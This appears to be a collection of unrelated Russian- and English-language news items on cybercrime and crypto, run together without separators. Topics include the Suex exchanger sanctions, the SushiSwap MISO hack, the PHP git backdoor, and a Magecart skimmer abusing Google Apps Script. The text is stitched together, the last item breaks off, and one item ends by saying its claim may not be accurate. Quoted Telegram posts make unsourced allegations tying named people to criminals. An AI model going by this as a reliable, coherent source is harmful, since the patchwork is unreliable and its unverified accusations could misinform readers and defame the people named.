Suex называют внебиржевым брокером криптовалюты — это не биржа, у которой есть централизованное управление и где пользователи держат счета, чтобы покупать и продавать криптовалюту, а площадка, куда пользователи приносят наличные и криптовалюту и обменивают их. То есть, простыми словами, криптообменник. Для такого бизнеса наличие и местоположение офлайновых офисов — принципиально важный момент: все сделки велись с крупными клиентами, а чтобы произвести обмен, требовалось их личное присутствие в одном из офисов компании, пишут исследователи.
Расследование показало, что платформа конвертировала криптовалюту в наличные деньги в отделениях в Москве и Санкт-Петербурге, а также, возможно, в других офисах в России и на Ближнем Востоке. В Праге компания была зарегистрирована только юридически — о ее физическом присутствии там ничего не известно.
Chainalysis называет Suex площадкой для отмывания денег. Другая компания — TRM labs, которая также занимается блокчейн-аналитикой, писала, что Suex либо умышленно, либо по незнанию заняла важное место на рынке обналичивания незаконно полученной криптовалюты. Стать клиентом Suex можно было только по рекомендации — случайный человек попасть туда не мог. Общение с клиентами шло через Telegram, но саму сделку заключить можно было только лично, приехав в офис. Компания работала только с крупными чеками, минимально допустимая транзакция составляла $10 тысяч, [пишет TRM](https://www.trmlabs.com/post/behind-suex-io-the-first-sanctioned- cryptocurrency-exchange). Сама компания криптовалюту не хранила, а вместо этого использовала инфраструктуру крупной криптобиржи — это помогало быстрее и дешевле проводить сделки, пишут исследователи.
По словам источника The Bell на криптовалютном рынке, Suex, как и другие подобные обменники в «Москва-Сити», пользовалась довольно большим спросом. Наличные туда попадали в основном с московских рынков, вроде «Садовода» или рынка в Люблино. На каждом из них есть пункт приема наличных денег, где их пересчитывают и везут в обменник. Самим предпринимателям на рынках криптовалюта нужна, чтобы расплачиваться с продавцами за границей, например в Китае. Товары через границу часто завозятся по заниженным ценам, а чтобы провести реальную оплату, нужна криптовалюта — стейблкоины Tether (USDT).
Криптообменник практически никак не проверял источники денег своих клиентов, утверждает собеседник The Bell на рынке. Об этом же до недавнего времени косвенно [говорилось](https://www.trmlabs.com/post/behind-suex-io-the-first- sanctioned-cryptocurrency-exchange) в профиле на LinkedIn одного из основателей платформы: он обещал, что на сделку в Suex потребуется меньше 24 часов — без долгих разбирательств и подтверждающих документов.
За счет доступа к большому потоку наличных и связей с крупной биржей Suex смогла довести объем обналичивания незаконно полученных криптовалют до угрожающих масштабов, [писала TRM](https://www.trmlabs.com/post/behind-suex- io-the-first-sanctioned-cryptocurrency-exchange). С какими именно биржами могла работать Suex, не уточняется, но после внесения компании в санкционный список стало известно, что она [использовала](https://www.coindesk.com/business/2021/09/23/binance-de- platformed-russian-otc-firm-suex-that-was-sanctioned-by-us/) учетные записи бирж Binance и Huobi.
Как пишет в своем расследовании Chainalysis, с момента основания в 2018 году Suex перевела криптовалюту на сотни миллионов долларов, в основном в биткоинах, Ethereum и Tether, а большая часть средств поступила из незаконных и высокорискованных источников. Только транзакции с биткоинами составили $481 млн, а все операции с хакерами-вымогателями и участниками даркнета исследователи оценили в $160 млн. В другой аналитической компании — Elliptic — оценки [оказались](https://www.elliptic.co/blog/ofac-ransomware-crackdown- targets-suex-crypto-exchange-that-has-received-more-than-900-million) еще выше: $370 млн незаконных транзакций и $900 млн всего.
В структуре незаконных операций около $13 млн, по данным Chainalysis, пришлось на операторов программ-вымогателей, а еще $24 млн — пришли от недавно рухнувшей пирамиды Finiko. Более $20 млн Suex получила от Hydra, крупнейшего русскоязычного даркнет-маркетплейса по торговле наркотиками. Еще $50 млн — с адресов, размещенных на заблокированной в США криптовалютной бирже BTC-e. Интересно, что сделки с криптовалютой BTC-e продолжались и после того, как она рухнула, а активы оказались заморожены, пишут исследователи. Более подробную схему распределения незаконных транзакций можно посмотреть [здесь](https://assets.website- files.com/5a95e929b010650001bae4c6/6149ebc939d0ed1148400139_cu2cUjS2bi9IX1M1nMqF0-4jIj46jMnRPQCJ_UY0oz5mXO0kYCpEoOVqHvrz5kp- zGLOktHxT9EWXlmL72j8-8FWMpYZ9BPvoxeoG1VNvqlGpgln1gPcBgcA9VpAd0DmfaFAPYFv%3Ds0.png).
Кто стоит за Suex
Крупнейший акционер Suex, россиянин Егор Петуховский, сейчас, если верить Facebook, живет в Цюрихе. Связь своего бизнеса с какой-либо незаконной деятельностью он отрицает: на своей странице в соцсети Петуховский назвал новости о Suex «дискредитацией» и заявил, что намерен защищать свое имя в суде в США.
Егор Петуховский (слева) и Ильдар Закиров
Петуховский — серийный предприниматель. В середине 2000-х он начинал с разработки сайтов в компании art of web, затем, если верить его собственному блогу, начал строить «группу компаний», которая занималась всем подряд — от нефтепродуктов и игр для соцсетей до школы иностранных языков, которая предлагает выучить язык за 16 уроков с полиглотом. А в 2014 году создал компанию m4bank.ru, которая делала платежные устройства для банков, а сейчас называется «Центр корпоративных технологий».
Suex Петуховский основал в 2018 году, как он сам описывал в блоге (сейчас эта страница удалена и [посмотреть](https://web.archive.org/web/20200601221525/http://petukhovsky.com:80/suex- successful-exchange/) ее можно только в архиве). Сначала его знакомый Иван Петуховский (по словам обоих, они не родственники, а однофамильцы), сооснователь криптовалютной биржи Exmo, рассказал ему о покупке криптовалют. А потом «все изменилось, когда мой партнер по ART OF WEB Максим привел в наш офис Ильдара, очень позитивного и жизнерадостного человека», — писал Егор Петуховский. Максим, по данным TRM, — еще один вероятный инвестор Suex. Расследователи называют две фамилии: Субботин и Курбангалеев — как будто это один человек, но это не так.
Максим Субботин — юрист, его юридическая фирма «Тримфин» зарегистрирована в той же башне «Федерация» в «Москва-Сити» и, судя по вакансиям, специализируется на делах, связанных с покупкой и продажей криптовалюты. Максим — выходец из Казани, основавший там Blockchain Club, курсы про криптовалюты и трейдинг. А еще — учредитель микрокредитной организации «Финстор», которую ЦБ [включил](https://www.business- gazeta.ru/news/511367) в список нелегальных кредиторов и финансовых пирамид.
Ильдар, о котором идет речь в блоге Петуховского, — это Ильдар Закиров, внебиржевой трейдер из Казани и еще один сооснователь Suex, который публично ассоциировал себя с компанией. Его Петуховский называл «человеком-успехом»: именно с прихода Закирова начался бизнес Suex, ему же удалось найти первого клиента, и в результате сделки компания заработала приличные деньги — 0,4826 BTC. «Вся пикантность состояла в том, что Иван был занят и не мог заниматься нашими сделками, предоставив механизм пополнения аккаунта на EXMO, и Ильдару, не имевшему на тот момент даже малейшего опыта обращения с биржей, пришлось совершать покупку криптовалют в реальном времени, прямо на бирже ставя ордера на покупку», — [писал](https://web.archive.org/web/20200601221525/http://petukhovsky.com:80/suex- successful-exchange/) Егор Петуховский. Интересно, что после внесения Suex в санкционный список Exmo заявила, что никакой связи с Suex не имела.
Кроме того, руководителями Suex называют чешского венчурного капиталиста Тибора Бокора и россиянина Василия Жабыкина. Последнему принадлежит 10% акций обменника. Жабыкин [подтверждал](https://www.nytimes.com/2021/09/21/us/politics/treasury- department-combating-ransomware-cryptocurrency.html) The New York Times свою связь с Suex. По его словам, компания создавалась для разработки программного обеспечения для финансовой индустрии. Любую незаконную деятельность Suex Жабыкин отрицает и считает, что минфин США по ошибке нацелился на компанию. Помимо Suex, Жабыкин руководил Neo bank — экспериментальным дочерним проектом МТС-Банка. Но после этой истории его предсказуемо уволили. «Коммерсант» писал со ссылкой на источник, что это решение было продиктовано исключительно санкциями США.
Василий Жабыкин
Расстаться с другим своим проектом пришлось и Егору Петуховскому. Помимо криптообменника, он был директором по вопросам листинга в популярном Telegram- боте для обмена криптовалют Chatex. После санкций ему пришлось из этого бизнеса выйти. Поможет ли это Chatex, неизвестно — хотя формально эти компании не связаны, у них «обширные корпоративные и юридические отношения», пишет TRM: например, они обе в разное время принадлежали эстонской компании Izibits.
Но и на этом история может не закончиться: по данным «Коммерсанта», движение «Стопнаркотик» уже подало заявления в ЦБ и МВД, в котором описало связи Suex с ExMo, группой компаний QIWI и украинским банком «Конкорд», позволявшие Suex проводить платежи для наркотического маркетплейса Hydra, оборот которого составляет $1,5 млрд в год.
_@infobomb, 22.09.2021 20:03: США блочат биткоины борца Михаила Мамишвили. Под санкции попал криптобменник SUEX aka Chatex. Там ФБР нашла 481 млн $, что отмыли аферисты биржи btc-e, пирамида Финико, наркомаркет Гидра и вымогатель Максим Якубец. Главный акционер SUEX — Егор Петуховский. Партнёры Василий Жабыкин, Ильдар Закаров, Максим Субботин. У Петуховского фирма с Валерием Брюсовым. Он первый зам Мамиашвили в федерации спортивной борьбы (ФСБ). Ещё — директор центра спортивной подготовки сборных команд России. А по базе знакомый бандитов. Бизнес криптовалютчика с борцом зовётся Спэйстраст. Петуховский пишет: "вообще не понятно как я попал в учредители". Но есть и другая фирма — Руско. Создана Егором Петуховским и Натальей Брюсовой, в девичестве Гайдуковой.
@infobomb, 23.09.2021 12:59: После атаки ФБР США на криптовалютчика Егора Петуховского из телеги пропала реклама его сервисов Chatex, SUEX, Izibits. Егор с друзьями из "ФСБ" потратили $ на пиар. Но честнее сообщить о санкциях и слежке людям, что юзают бот чатекса._
Разработчики децентрализованной биржи SushiSwap сообщили, что в результате хакерской атаки с платформы для продажи токенов MISO были украдены 864 ETH.
Согласно записи в Twitter технического директора SushiSwap Джозеф Делонга (Joseph Delong), хакер использовал уязвимость на платформе MISO во время аукциона по продаже невзаимозаменяемых токенов (NFT) и вывел 864.8 ETH стоимостью около $3 млн.
Делонг заявил, что анонимный подрядчик, использующий псевдоним AristoK3 на Github, внедрил вредоносный код во внешний интерфейс MISO. Он добавил ссылку на адрес Эфириума, на который 16 сентября во второй половине дня были переведены 864.8 ETH. Etherscan пометил адрес как «связанный со взломом».
Подобные атаки заключаются в том, что злоумышленник меняет адрес контракта на тот, который находится под его контролем. По данным Национального центра контрразведки и безопасности США, этот тип атаки актуален для библиотек программного обеспечения с открытым исходным кодом.
По словам Делонга, для продажи NFT JayPegsAutoMart использовался только один контракт. Злоумышленник, который работал с протоколом DeFi Yearn.finance, заменил адрес кошелька аукциона на свой. Разработчики SushiSwap полагают, что взлом совершил разработчик блокчейна и мобильных игр eratos1122, которому принадлежит соответствующий аккаунт в Twitter.
SushiSwap обратилась к биржам FTX и Binance с запросом на получение информации о хакере, хранящейся на площадках в рамках процедуры KYC. Делонг заявил, что, если злоумышленник не вернет деньги сегодня, то биржа подаст жалобу в ФБР.
Напомним, что ранее на платформе MISO уже были выявлены уязвимости. В августе SushiSwap избежала взлома на $365 млн благодаря «белому хакеру».
Popular German cloud hosting and dedicated server provider Hetzner has banned cryptomining on its servers after users have been using their large storage devices to mine Chia.
For those not familiar with Chia, instead of mining the cryptocurrency with specialized equipment or graphics cards, it uses a new mining system called Proof of Space and Proof of Time.
"Users of the Chia blockchain will 'seed' unused space on their hard-disk
drive by installing software which stores a collection of cryptographic
numbers on the disk into 'plots.' These users are called "farmers," the Chia
FAQ explains.
"When the blockchain broadcasts a challenge for the next block, farmers can
scan their plots to see if they have the hash that is closest to the
challenge. A farmer’s probability of winning a block is the percentage of the
total space that a farmer has compared to the entire network."
As it is important to create plots as quickly as possible to not miss out on challenges, miners have been purchasing fast SSD or NVME drives to perform the plotting, and when created, move them to slower SATA hard disk drives to farm the plots for rewards.
With Chia currently valued at $1,000 and recently as high as $1,645.12, it has become a popular cryptocurrency to mine.
According to Hetzner, this has led to an influx of people renting their high- capacity storage systems known as 'Storage Boxes' for Chia plotting and farming.
For example, Hetzner's largest BX60 Storage box offers 10 TB of storage for €47.48 per month.
Out of concern that Chia mining will damage their drives due to heavy use, the hosting provider has banned all mining on their cloud servers, hosting services, and storage boxes.
"In order for us to operate a high-performing and reliable network for our customers, the operation of applications for mining crypto currencies is prohibited," says the Hetzner Storage Box service agreement.
Hetzner further explained their reasons on Twitter in reply to a user's concern about this new policy change.
"Yes, it's true, we have expanded the terms and conditions and banned crypto mining. We have received many orders for our large hard drive servers. For this, however, large storage boxes are increasingly being rented," tweeted Hetzner's Twitter account today.
"With storage boxes this leads to problems with the bandwidth on the host systems. With chia mining there is also the problem that the hard drives are extremely stressed by the many read and write processes and will therefore break."
However, this concern af Chia farming destroying drives may be overhyped when it comes to enterprise storage or hard disk drives.
Chia creator Bram Cohen has explained in a Twitter thread that plotting using consumer-grade SSDs can prematurely wear them down, plotting on enterprise SSD or hard disk drives will not cause a problem.
For some odd reason the 'Chia burns out hard drives!' is getting repeated as the fashionable fud. This is odd, because for the most part it's just plain wrong (thread)
— Bram Cohen (@bramcohen) May 16, 2021Click to expand...
While it is likely too soon to see what impact Chia will have on a drive's durability, its demand has been good for Western Digital and Seagate, who have [seen their stock prices rise](https://markets.businessinsider.com/currencies/news/seagate-western- digital-stocks-rise-chia-propels-hard-drive-shortage-2021-5-1030438017) due to the increased purchasing of hard drives.
В Петербурге полиция арестовала мошенника, который воровал информацию о пользователях Госуслуг и использовал ее для получения микрозаймов на их имена.
Мошенник создавал фальшивые веб-сайты, похожие на официальные порталы, и заманивал пользователей, заставляя их вводить свои данные. После этого он использовал полученную информацию, чтобы получить доступ к аккаунтам пользователей настоящих Госуслуг и подавать заявки на микрокредиты.
Затем он выводил деньги через анонимные электронные кошельки. Более 130 человек пострадали от его действий.
Но это не точно...
Компания Google, принадлежащая холдингу Alphabet, объявила о важных изменениях в работе своего приложения Google Карты. Теперь компания не будет иметь доступа к истории местоположения пользователей, что ограничивает её возможности по отклику на запросы правоохранительных органов, требующих данные о всех лицах, находившихся вблизи места преступления.
Как указано в блоге Google на этой неделе, изменения коснутся функции «История местоположений» в Google Картах. Эта функция, по утверждению компании, изначально отключена, но помогает пользователям вспомнить, где они были. Согласно заявлению компании, если пользователи активируют эту функцию, их данные о местоположении будут сохраняться непосредственно на устройствах, что не позволит Google видеть эти данные, а следовательно, и передавать их правоохранительным органам по их запросу.
Марло Макгрифф, директор по продуктам Google Карт, подчеркнула в блоге: «Информация о вашем местоположении является личной. Мы стремимся обеспечить её безопасность, конфиденциальность и контроль со стороны пользователя».
Адвокат EFF Линч отметила, что Google заслуживает признания за этот шаг, но при этом указала, что компания долгое время была единственной технологической компанией, реагирующей на запросы геозонных ордеров. «Отлично, что Google предпринимает эти шаги, но в то же время никто другой не собирал и не хранил данные таким образом, как Google», - сказала она.
Apple, также имеющая приложение для карт, заявила, что технически не способна предоставлять тип данных о местоположении, который требуется полиции. Однако есть ещё один тип ордера, который беспокоит сторонников конфиденциальности: так называемые обратные ордера на поисковые запросы, когда полиция может запросить у технологической компании данные о людях, ищущих определённый термин. «Поисковые запросы могут быть чрезвычайно чувствительны, даже если вы просто ищете адрес», - добавила Линч.
sc: blog.google/products/maps/updates-to-location-history-and-new-controls- coming-soon-to-maps
Компания Artivion, производитель оборудования для сердечно-сосудистой хирургии, в прошлый понедельник сообщила о кибератаке, состоявшейся примерно 21 ноября 2024 года, в результате которой работа фирмы была нарушена, а некоторые системы временно отключены.
В официальном заявлении SEC указано, что компания приняла меры по реагированию на инцидент, включая отключение определённых систем, начало расследования и привлечение внешних консультантов, включая юристов, ИБ-специалистов и судебных экспертов. В заявлении также сказано, что злоумышленники зашифровали файлы и получили доступ к данным, хранящимся на скомпрометированных системах.
Компания заявила, что работает над безопасным восстановлением инфраструктуры и проводит анализ возможных обязательств по уведомлению пострадавших сторон. В ходе атаки были затронуты корпоративные операции, обработка заказов и доставка продукции.
Большинство нарушений удалось устранить, однако компания ожидает дополнительных расходов, которые не будут покрыты страхованием. Artivion также предупредила о рисках, связанных с задержками в восстановлении систем, что может привести к значительному воздействию на деятельность компании в будущем.
Несмотря на то, что ответственность за атаку пока не взяла на себя ни одна хакерская группа, подобные действия часто сопровождаются публикацией данных в случае отказа от выплаты выкупа.
Artivion разрабатывает продукцию для сердечно-сосудистых операций, включая стент-графты, хирургические герметики, механические клапаны сердца и имплантируемые ткани. Производственные мощности компании находятся в США и Германии, а продукция представлена более чем в 100 странах. По прогнозам, выручка компании в 2024 году составит около $396 миллионов.
Сотрудники управления по борьбе с организованной преступностью ИНИ и прокуроры ПККОКС задержали двух членов международной преступной группы, обвиняемых в мошенничестве и отмывании денег. Группа использовала фальшивые инвестиционные платформы для обмана потенциальных инвесторов, особенно из Румынии. Преступная деятельность началась в 2022 году.
В августе, в рамках операции «Deep Fake», власти Молдовы и Румынии провели 60 обысков в домах и офисах, включая четыре колл-центра в Кишиневе, Яловенах и Окнице. Недавно были выявлены ещё два нелегальных офиса. Члены группы представлялись представителями или брокерами фиктивных компаний и использовали методы манипуляции для убеждения жертв инвестировать в криптовалюту и другие активы через созданные ими платформы.
28 ноября полиция при поддержке BPDS «Fulger» провела обыски, в ходе которых были выявлены 99 человек, вовлеченных в мошенничество в таких странах, как Румыния, Италия, Турция и франкофонные регионы. Изъяты 72 мобильных телефона, 78 системных блоков, личные документы, банковские карты и различное IT- оборудование.
Предварительный ущерб превышает 20 миллионов леев, а ежедневный доход преступной группы оценивается в 120 000 долларов. Расследование продолжается, с целью выявления других пострадавших и окончательной оценки нанесенного ущерба. Все лица считаются невиновными до вынесения окончательного решения суда.
Сотрудники УБК МВД России совместно с коллегами из Красноярского края и Омской области задержали четверых подозреваемых. Им инкриминируется мошенничество, совершенное с использованием сети Интернет.
«Предварительно установлено, что житель Красноярского края и трое фигурантов из Омской области занимались противоправной деятельностью с ноября 2022 года. Для этого они использовали уязвимости интернет-приложения для заказа такси.
Злоумышленники по изготовленным в графическом редакторе фотографиям подложных удостоверений регистрировались в программе сервиса в качестве водителей. Затем с использованием одноразовых сим-карт создавали аккаунты клиентов, от имени которых заказывали поездки. С помощью подмены координат местоположения они фиксировались как исполненные. После определенного количества успешных рейсов на банковскую карту водителя перечислялись премиальные. Когда система блокировала виртуальных таксистов – аферисты оформляли новые учетные записи и продолжали незаконные действия. Ущерб составил более 5 млн рублей», - рассказала официальный представитель МВД России Ирина Волк.
Следователем ГСУ ГУ МВД России по Красноярскому краю возбуждено уголовное дело по признакам преступлений, предусмотренных статьей 159 УК РФ. Полицейские при поддержке сотрудников Росгвардии одновременно в двух регионах провели задержания и обыски. У подозреваемых изъяты смартфоны, компьютерная техника, банковские и сим-карты, денежные средства, документы и другие предметы, имеющие доказательственное значение.
«В отношении двоих фигурантов избрана мера пресечения в виде заключения под стражу, один находится под домашним арестом и еще один – под подпиской о невыезде и надлежащем поведении», - сообщила Ирина Волк.
Также он не объяснил каким образом смог использовать криптовалютный кошелек на 2 млн грн
НАПК по материалам ГБР и по результатам мониторинга образа жизни главного инспектора по особым поручениям Департамента киберполиции Нацполиции выявило признаки незаконного обогащения на сумму более 12 млн грн. Инспектор киберполиции не смог объяснить оплату строительства пляжного комплекса с бассейном и разницу между расходами и доходами эксдружины на 2,8 млн, сообщает НАПК.
Вручено подозрение, а действия квалифицированы по статье 368-5 Уголовного кодекса Украины, которая устанавливает ответственность за незаконное обогащение).
"НАПК установило, что он приобрел объекты движимого и недвижимого имущества (в том числе по заниженной стоимости), нематериальные активы и зарегистрировал их на близких и третьих лиц.
Для сокрытия состояния чиновник даже официально расторг свой брак, однако и в дальнейшем поддерживал семейные отношения с бывшей женой, о чем, в частности, свидетельствует рождение общего второго ребенка и совместные путешествия за границу.
В ходе мониторинга образа жизни чиновника НАПК не установило законных источников происхождения средств сотрудника полиции и его близких и третьих лиц, в частности, для приобретения:
квартиры в Киеве стоимостью почти 3 млн грн;
земельного участка в Киеве за более чем 51 тыс. грн;
автомобиля Lexus RX 350 стоимостью почти 1 млн грн;
мотоцикла Yamaha MT 09 стоимостью 50 тыс. грн;
привлечение на криптовалютный кошелек 55 тыс. USDT (эквивалент 2,035 млн грн);
оплаты товаров/работ/услуг для строительства пляжного комплекса с бассейном под Киевом более чем на 3 млн грн;
превышение расходов над законными доходами эксдружиной на более 2,8 млн грн.
Общая стоимость незаконных активов составляет 12,2 млн грн.
НАПК предоставило запрос относительно объяснения доходов. В ответ получило сообщение, что сотрудник киберполиции не знает ничего о криптокошельке, а отношения к пляжному комплексу и упомянутой недвижимости не имеет.
Национальное агентство по вопросам предотвращения коррупции внесло предписание городскому голове в Хмельницкой области из-за прямого подчинения мэру - жене. Староконстантиновский городской голова получил предписание с требованием «устранить отношения прямого подчинения между ним и его женой, которая занимает одну из руководящих должностей в аппарате Староконстантиновского горсовета», - сообщили в НАПК.
• Source: zn.ua/ukr/UKRAINE/inspektor-kiberpolitsiji-ne-zmih-pojasniti-oplatu- pljazhnoho-kompleksu-z-basejnom-i-perevishchennja-vitrat-na-2-8-mln-nazk.html
Главным следственным управлением Следственного комитета совместно с Департаментом финансовых расследований Комитета госконтроля пресечена деятельность крупного теневого криптообменника на территории Минска. Об этом БЕЛТА сообщили в СК.
По данным следствия, 37-летний иностранный гражданин занимался предпринимательской деятельностью в гражданском обороте без государственной регистрации в качестве резидента ПВТ. Деятельность была связана с реализацией криптовалюты и иностранной валюты в интересах третьих лиц.
Обвиняемый в 2019 году привлек для участия в преступной схеме 35-летнего знакомого. Известно, что фигуранты причастны к аналогичной деятельности в ОАЭ, Армении, Грузии, России, Казахстане, Азербайджане, Украине и Таджикистане. На преступной схеме обвиняемые заработали не менее Br9 млн.
Мужчин задержали в Минске, цифровые носители информации, криптовалюта и денежные средства, добытые преступным путем, были изъяты. Фигурантам предъявлены обвинения по ч.3 ст.243 (уклонение от уплаты налогов в особо крупном размере) и ч.4 ст.16 (соучастие в качестве организатора в уклонении от уплаты налогов в особо крупном размере) УК.
Также следователи и оперативники Департамента финансовых расследований задержали 41-летнего жителя Минска, который может быть причастен к финансированию преступной деятельности.
Бюро по кибербезопасности и технологическим преступлениям Гонконга (CSTCB) запустило платформу CyberDefender Metaverse для информирования общественности об опасностях, связанных с Web3-индустрией и метавселенными.
Подразделение кибербезопасности полиции Гонконга уверяет, что CyberDefender Metaverse поможет предотвратить преступления в киберпространстве. Правоохранители намерены подготовить граждан к «вызовам цифровой эпохи». На платформе прошла презентация под названием Exploring the Metaverse, где обсуждались стратегии предотвращения преступности в виртуальных мирах.
Главный инспектор CSTCB Ип Чеук-ю (Ip Cheuk-yu) призвал пользователей метавселенных проявлять бдительность, потому что мошенничество с инвестициями, несанкционированный доступ к системам, кражи криптоактивов и преступления сексуального характера могут совершаться и в метавселенных.
«Децентрализованность виртуальных активов в Web3 повышает вероятность киберпреступлений. Злоумышленники нацеливаются на устройства пользователей для хранения криптовалют, а также на кошельки для виртуальных активов и смарт- контракты», — сказал инспектор CSTCB.
Полиция Гонконга пообещала, что будет чаще проводить образовательные семинары для молодежи, рассказывая о последних достижениях в области информационных технологий. Речь пойдет и о преступлениях, для совершения которых задействуются новейшие технологии. По данным правоохранителей, в первом квартале 2023 года было зарегистрировано 663 правонарушений, связанных с виртуальными активами. Общие убытки жертв составили $570 млн, что на 75% больше, чем в первом квартале 2022 года.
Злоумышленники регистрировали фейковые благотворительные фонды, на счета которых собирали пожертвования якобы для помощи детям. Большую часть полученных денег участники группировки распределяли между собой. Организаторам правоохранители объявили подозрение.
Мошенническую схему разоблачили сотрудники киберполиции Киева совместно со следственным отделом Дарницкого управления полиции.
Трое организаторов группировки зарегистрировали фиктивные организации, которые выдавали за благотворительные фонды. Привлекая еще трех исполнителей, они образовали call-центр, откуда звонили предпринимателям и представителям различных организаций и просили, чтобы они присоединились к денежным сборам. Злоумышленники уверяли, что собирают на нужды пострадавших от войны детей. Для маскировки противоправной деятельности группировка действительно перечисляла около 5% полученных денег на благотворительность. Однако, остальное распределяли между собой.
Таким образом они присвоили более 10 миллионов гривен.
В домах фигурантов и по месту расположения call-центра правоохранители провели обыски. Изъяты мобильные телефоны, ноутбуки, банковские карты, документация и печати. К проведению следственных действий также были привлечены сотрудники полка полиции особого назначения.
Организаторы схемы задержаны в порядке ст. 208, п. 6 ч. 1 ст. 615 Уголовного процессуального кодекса Украины.
Открыто уголовное производство по ч. 3 ст. 201-2 (Незаконное использование с целью получения прибыли гуманитарной помощи, благотворительных пожертвований или бесплатной помощи) Уголовного кодекса Украины. Четырем фигурантам объявлено о подозрении, им грозит до семи лет лишения свободы с конфискацией имущества. Решается вопрос об объявлении подозрения соучастникам группировки. Следственные действия продолжаются.
Процессуальное руководство Дарницкой окружной прокуратуры Киева.
Опубликованы первые результаты разбора инцидента, связанного с выявлением в Git-репозитории проекта PHP двух вредоносных коммитов с бэкдором, активируемым при передаче запроса со специально оформленным заголовком User Agent. В ходе изучения следов деятельности атакующих был сделан вывод, что непосредственно сервер git.php.net, на котором был размещён git-репозиторий не был взломан, но была скомпрометирована база данных с учётными записями разработчиков проекта.
Не исключается, что злоумышленники смогли загрузить базу пользователей, хранившуюся в СУБД на сервере master.php.net. Содержимое master.php.net уже перенесено на новый сервер main.php.net, установленный с нуля. Все пароли разработчиков, использовавшиеся для доступа к инфраструктуре php.net, были сброшены и инициирован процесс их смены через специальную форму восстановления пароля. Репозитории git.php.net и svn.php.net остаются доступны в режиме только для чтения (разработка перенесена на GitHub).
После обнаружения первого вредоносного коммита, совершённого через учётную запись Расмуса Лердорфа, основателя PHP, было сделано предположение, что взломан его аккаунт и Никита Попов, один из ключевых разработчиков PHP, откатил изменения и блокировал права коммита для проблемной учётной записи. Через какое-то время пришло осознание, что блокировка не имела смысла, так как без верификации коммитов по цифровой подписи, любой участник с доступом к репозиторию php-src мог внести изменение, подставив фиктивное имя автора.
Следом атакующие отправили вредоносный коммит от имени самого Никиты. Через анализ логов сервиса gitolite, применяемого для организации доступа к репозиториям, была предпринята попытка определения участника, который действительно внёс изменения. Несмотря на включённый учёт всех коммитов, для двух вредоносных изменений в логе не оказалось записей. Стало ясно, что имеет место компрометация инфраструктуры, так как коммиты добавлены напрямую, в обход подключения через gitolite.
Оперативно был отключён сервер git.php.net, а первичный репозиторий переведён на GitHub. Впопыхах было упущено из виду то, что для доступа к репозиторию кроме SSH с использованием gitolite имелся ещё один вход, позволяющий отправлять коммиты через HTTPS. В данном случае для взаимодействия с Git использовался бэкенд git-http-backend, а аутентификация выполнялась при помощи HTTP-сервера Apache2, который проверял полномочия через обращение к базе данных, размещённой в СУБД на сервере master.php.net. Допускался вход не только по ключам, но и по обычному паролю. Разбор логов http-сервера, подтвердил, что вредоносные изменения были добавлены через HTTPS.
При изучении логов было выявлено, что атакующие подключились не с первого раза, а вначале пытались подобрать имя учётной записи, но после определения вошли с первой попытки, т.е. они заранее знали пароли Расмуса и Никиты, но не знали их логины. Если атакующие смогли получить доступ к СУБД, то непонятно, почему они сразу не использовали указанный там корректный логин. Данная несостыковка пока не получила достоверного объяснения. Взлом master.php.net рассматривается как наиболее вероятный сценарий, так как на данном сервере был использован очень старый код и устаревшая ОС, которые давно не обновлялись и имели неисправленные уязвимости.
Из предпринятых действий отмечается переустановка окружения сервера master.php.net и перевод скриптов на новую версию PHP 8. Код для работы с СУБД переделан для использования параметризованных запросов, усложняющих подстановку SQL-кода. Для хранения хэшей паролей в БД задействован алгоритм bcrypt (ранее пароли хранились с использованием ненадёжного хэша MD5). Существующие пароли сброшены и предложено установить новый пароль через форму восстановления пароля. Так как доступ к репозиториям git.php.net и svn.php.net по HTTPS был привязан к хэшам MD5, решено оставить git.php.net и svn.php.net в режиме только для чтения, а также перенести все остающиеся на них репозитории расширений PECL на GitHub, по аналогии с основным репозиторием PHP.[
ИБ-эксперт Эриком Брандель (Eric Brandel) обнаружил, что злоумышленники злоупотребляют платформой Google Apps Script для кражи информации о банковских картах, которую пользователи предоставляют e-commerce сайтам при совершении покупок в интернете.
Хакеры используют для своих целей домен script.google.com и таким образом успешно скрывают свою вредоносную активность от защитных решений, а также обходят Content Security Policy (CSP). Дело в том, что интернет-магазины обычно рассматривают домен Google Apps Script как надежный и часто заносят в белый список вообще все поддомены Google.
Брандель рассказывает, что нашел обфусцированный скрипт веб-скиммера, внедренного злоумышленниками на сайты интернет-магазинов. Как и любой другой MageCart-скрипт, он перехватывает платежную информацию пользователей.
От других похожий решений этот скрипт отличало то, что вся ворованная платежная информация передавалась в виде JSON в кодировке base64 в Google Apps Script, и домен script[.]google[.]com использовался для извлечения краденных данных. Только после этого информация передавалась на подконтрольный атакующим домен analit[.]tech.
«Вредоносный домен analit[.]tech был зарегистрирован в тот же день, что и ранее обнаруженные вредоносные домены hotjar[.]host и pixelm[.]tech, которые размещены в той же сети», — отмечает исследователь.
Click to expand...
Нужно сказать, что это не первый случай, когда хакеры злоупотребляют сервисами Google в целом и Google Apps Script в частности. К примеру, еще в 2017 году стало известно, что группировка Carbanak использует сервисы Google (Google Apps Script, Google Sheets и Google Forms) в качестве основы для своей C&C-инфраструктуры. Также в 2020 году сообщалось, что платформой Google Analytics тоже злоупотребляют для атак типа MageCart.
Источник: xakep.ru/2021/02/20/google-apps-script-magecart/
Мессенджер Telegram пользуется колоссальным успехом среди преступников, особенно в Юго-Восточной Азии. Такой вывод сделали эксперты Управления ООН по наркотикам и преступности в своем отчете «Транснациональная организованная преступность и конвергенция кибермошенничества, подпольного банкинга и технологических инноваций: меняющийся ландшафт угроз».
Аналитики подчеркнули, что получили данные из тысячи Telegram-каналов, находящихся по другую сторону закона. В них они обнаружили многочисленные организованные преступные сообщества, базирующиеся, судя по используемым языкам и косвенным данным, как раз в азиатском регионе. В связи с этим в ООН пришли к мнению, что мессенджер стал пристанищем для влиятельным преступников, которые с его помощью расширяют серые сегменты экономики.
Среди конкретных специализаций упоминаются поставщики нелицензированных услуг (в том числе валютных), кардеры и разработчики различного вредоносного ПО и программ для создания дипфейков. Отмечается, что всем исследованным каналам свойственен низкий уровень модерации контента или полное ее отсутствие.
https://www.unodc.org/roseap/uploads/documents/Publications/2024/TOC_Convergence_Report_2024.pdf
Помимо операционных проблем, связанных с нехваткой кадров, CISO (Chief Information Security Officer) не дают спать по ночам стоимость эксплуатации платформ безопасности и расходы на их обучение.
Хотя руководители подразделений SecOps сталкиваются с различными проблемами в своей работе, среди них выделяются две: трудности, связанные с нехваткой специалистов в киберсфере, и проблемы, связанные с эксплуатацией и исследованием широко используемых инструментов.
